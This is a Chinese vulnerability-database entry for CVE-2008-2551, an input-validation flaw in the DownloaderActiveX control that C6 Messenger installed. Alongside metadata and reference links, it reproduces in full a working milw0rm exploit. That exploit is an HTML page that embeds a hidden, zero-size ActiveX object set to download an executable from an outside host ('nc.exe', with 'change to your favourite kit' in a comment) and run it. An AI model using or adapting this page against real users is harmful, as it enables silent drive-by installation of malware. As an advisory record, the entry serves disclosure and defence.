Icona SpA C6 Messenger Installation URL Downloader ActiveX控件输入验证漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115347 漏洞类型 权限许可和访问控制
发布时间 2008-06-03 更新时间 2009-01-29
CVE编号 CVE-2008-2551 CNNVD-ID CNNVD-200806-086
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/5732
https://cxsecurity.com/issue/WLB-2008060087
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-086
|漏洞详情
IconaSpAC6Messenger1.0.0.1版本中的DownloaderActiveX控件(DownloaderActiveX.ocx)远程攻击者可以借助propDownloadUrl参数中的一个URL,强制下载和运行任意文件。propPostDownloadAction参数要被设置成"运行"。
|漏洞EXP
<!--

C6 Messenger Installation Url DownloaderActiveX Control Remote Download
& Execute Exploit

by
Nine:Situations:Group::SnoopyAssault

site: http://retrogod.altervista.org/

"C6 Messenger is an instant messaging program produced by Telecom Italia Group,
specifically by Alice (distribution), Icon Spa (development, design and server)
and Opendoc (graphics). It is the only instant messenger entirely produced in
Italy, is a free program, allows you to chat in real time with friends[..]"

installation urls:
http://c6.community.alice.it/home/index.html
http://c6.community.alice.it/download/c6.html

Whoever accessed the second one with IE to install c6 IM is vulnerable to this
threat. Notice that you can pass also local urls to "propDownloadUrl" property
and bypass Internet zone, no host check is performed.
"propPostDownloadAction" one is used to launch the executable.
A progress bar is shown but you can easily make it not visible.

settings:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data
IPersist Safe:  Safe for untrusted: caller,data

info:
http://www.google.com/search?hl=en&q=c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61&meta=&num=100&filter=0
Let me guess, this one is already exploited in the wild...
Thanks Mommy Telecom Italia!!

If you think this poc is useful, please help us to improve our equipment and
donate through the paypal button on our site!

--------------------------------------------------------------------------------
Goodbye rgod-tsid-pah he-ru-ka!
-->
<HTML>
<BODY>
<OBJECT ID="DownloaderActiveX1"
WIDTH="0"
HEIGHT="0"
CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61"
CODEBASE="DownloaderActiveX.cab#Version=1,0,0,1">
<PARAM NAME="propProgressBackground"  VALUE="#bccee8">
<PARAM NAME="propTextBackground"  VALUE="#f7f8fc">
<PARAM NAME="propBarColor"  VALUE="#df0203">
<PARAM NAME="propTextColor"  VALUE="#000000">
<PARAM NAME="propWidth"  VALUE="0">
<PARAM NAME="propHeight"  VALUE="0">
<PARAM NAME="propDownloadUrl"  VALUE="http://yoursite.com/nc.exe"><!-- change to your favourite kit ! :) -->
<PARAM NAME="propPostDownloadAction"  VALUE="run"> <!-- lol -->
<PARAM NAME="propInstallCompleteUrl"  VALUE="">
<PARAM NAME="propBrowserRedirectUrl"  VALUE="">
<PARAM NAME="propVerbose"  VALUE="0">
<PARAM NAME="propInterrupt"  VALUE="0">
</OBJECT>
</BODY>
</HTML>

# milw0rm.com [2008-06-03]
|参考资料

来源:XF
名称:iconaspa-downloaderactivex-code-execution(42825)
链接:http://xforce.iss.net/xforce/xfdb/42825
来源:BID
名称:29519
链接:http://www.securityfocus.com/bid/29519
来源:BUGTRAQ
名称:20080603[NSG03-06-2008]C6MessengerInstallationUrlDownloaderActiveXControlRemoteDownload&ExecuteExploit
链接:http://www.securityfocus.com/archive/1/archive/1/493019/100/0/threaded
来源:MILW0RM
名称:5732
链接:http://www.milw0rm.com/exploits/5732
来源:VUPEN
名称:ADV-2008-1733
链接:http://www.frsirt.com/english/advisories/2008/1733/references
来源:SREASON
名称:3926
链接:http://securityreason.com/securityalert/3926
来源:SECUNIA
名称:30512
链接:http://secunia.com/advisories/30512